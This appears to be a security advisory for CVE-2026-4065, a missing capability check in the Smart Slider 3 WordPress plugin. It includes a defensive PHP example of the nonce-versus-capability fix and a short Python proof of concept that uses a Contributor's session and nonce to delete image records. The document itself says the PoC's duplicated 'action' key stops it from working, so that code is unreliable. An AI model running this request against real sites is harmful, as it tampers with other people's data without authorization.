Security Vulnerability Report
CVE-2026-4065 CVSS 5.4 MEDIUM

Published: 2026-04-07 22:16:25
Last Modified: 2026-04-27 19:04:23

Description

The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages.
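To make the nonce-versus-capability distinction in the description concrete, here is an added WordPress admin-ajax handler written for this report (not Smart Slider 3 code): the nonce-only pattern the advisory describes beside the same handler with the capability check the fix requires. The function, action and table names are hypothetical; the WordPress API calls are real.

```php
<?php
// Added illustration, not the plugin's code. Hypothetical names throughout.

function example_delete_image_record( $image_id ) {
    // Hypothetical storage table; $wpdb->delete() is the real WordPress API.
    global $wpdb;
    return $wpdb->delete( $wpdb->prefix . 'example_images', array( 'id' => $image_id ), array( '%d' ) );
}

// WEAK (the pattern in the advisory): only the nonce is validated, as validateToken() does.
// A nonce proves the request originated from a page that embedded it, not that the user
// may perform the action. If that nonce is rendered on the post editor, any user who can
// open the editor (a Contributor) can reuse it against every action that checks nothing else.
function example_ajax_delete_image_nonce_only() {
    check_ajax_referer( 'example_nonce_action', 'nextend_nonce' ); // dies on a bad nonce
    $image_id = isset( $_POST['image_id'] ) ? absint( $_POST['image_id'] ) : 0;
    example_delete_image_record( $image_id );
    wp_send_json_success();
}

// HARDENED: authorization is checked on every action, independently of the nonce,
// which is what a validatePermission()/checkForCap() call provides.
function example_ajax_delete_image_checked() {
    check_ajax_referer( 'example_nonce_action', 'nextend_nonce' );

    // The capability is the real gate. Contributors lack unfiltered_html, so they stop here.
    // wp_send_json_error() ends the request, so no explicit return is needed.
    if ( ! current_user_can( 'unfiltered_html' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    $image_id = isset( $_POST['image_id'] ) ? absint( $_POST['image_id'] ) : 0;
    if ( 0 === $image_id ) {
        wp_send_json_error( array( 'message' => 'Invalid image id' ), 400 );
    }
    example_delete_image_record( $image_id );
    wp_send_json_success( array( 'deleted' => $image_id ) );
}

// Register only the checked handler; admin-ajax.php routes on the 'action' field.
add_action( 'wp_ajax_example_delete_image', 'example_ajax_delete_image_checked' );
```

When reviewing a plugin's AJAX dispatcher, the check to apply is that every registered action reaches a `current_user_can()` (or equivalent) call on the request path, not just a nonce check in a shared entry point.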

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

Smart Slider 3 <= 3.5.1.33

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
attacker_cookie = "wordpress_logged_in_xxx=...; wp_sec_xxx=..."

# Step 1: Obtain nextend_nonce from the post editor page (simulated here)
# In a real attack, scrape this value from /wp-admin/post.php?post=ID&action=edit
nextend_nonce = "<OBTAIN_NONCE_FROM_EDITOR>"

# Step 2: Prepare payload to delete an image record (example action)
payload = {
    "action": "smartslider3",
    "nextend_nonce": nextend_nonce,
    "controller": "image",
    # Note: this key duplicates "action" above; in a Python dict the later value
    # wins, so the request as written is not dispatched to the plugin's handler.
    "action": "delete",
    "image_id": "1"
}

headers = {
    "Cookie": attacker_cookie,
    "Content-Type": "application/x-www-form-urlencoded"
}

# Step 3: Send the exploit request
response = requests.post(target_url, data=payload, headers=headers)
if response.status_code == 200:
    print("[+] Exploit request sent successfully")
    print("[+] Response:", response.text)
else:
    print("[-] Exploit failed")

References

Weakness: CWE-862 (Missing Authorization)
NVD record status: Deferred

https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/Framework/Image/ControllerAjaxImage.php#L37
https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Application/Admin/Sliders/ControllerAjaxSliders.php#L26
https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Platform/WordPress/Admin/AdminHelper.php#L155
https://plugins.trac.wordpress.org/browser/smart-slider-3/tags/3.5.1.32/Nextend/SmartSlider3/Platform/WordPress/HelperTinyMCE.php#L30
https://plugins.trac.wordpress.org/browser/smart-slider-3/trunk/Nextend/SmartSlider3/Platform/WordPress/Admin/AdminHelper.php#L155
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3489689%40smart-slider-3%2Ftrunk&old=3439582%40smart-slider-3%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/53a08b59-b7e0-419a-bfc3-528bcddb1ac2?source=cve